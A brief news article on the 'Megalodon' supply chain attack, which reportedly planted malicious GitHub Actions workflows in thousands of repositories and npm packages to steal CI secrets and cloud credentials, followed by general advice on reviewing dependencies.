Massive GitHub Repository Breach Exposes Over 5,500 Organizations to ‘Megalodon’ Malware
Massive Supply Chain Attack Compromises Over 5,500 GitHub Repositories
A sophisticated supply chain attack has exposed over 5,500 GitHub repositories to potential data theft and unauthorized access. The attack, known as Megalodon, leveraged automated commits to inject malicious code into repositories.
- The infected packages were published on GitHub between May 19 and May 21, 2026.
- The malicious commits were pushed to the affected repositories within a six-hour window on May 18, 2026.
- The attackers’ modus operandi involved injecting malicious GitHub Actions workflows that would trigger on every push and pull request, creating dormant backdoors.
- These backdoors enabled the attackers to exfiltrate sensitive information, including:
- CI environment variables
- AWS credentials
- GCP access tokens
- Azure credentials
- SSH private keys
- Docker and Kubernetes configurations
- API keys
- Database connection strings
- Github Actions tokens
- GitLab CI/CD tokens
The compromised packages were published under the same NPM account, ‘eljohnny’, without any changes to the account itself.
This incident highlights the importance of vigilance in monitoring third-party dependencies and ensuring that all updates are thoroughly reviewed before deployment.
Researchers warn that if platforms continue to allow unvetted code uploads, the number of attacks will only increase.
As a result of this breach, several major companies have taken steps to invalidate their NPM granular access tokens with write access that bypass two-factor authentication. This move aims to prevent future attacks by limiting the potential damage that can be caused by compromised accounts.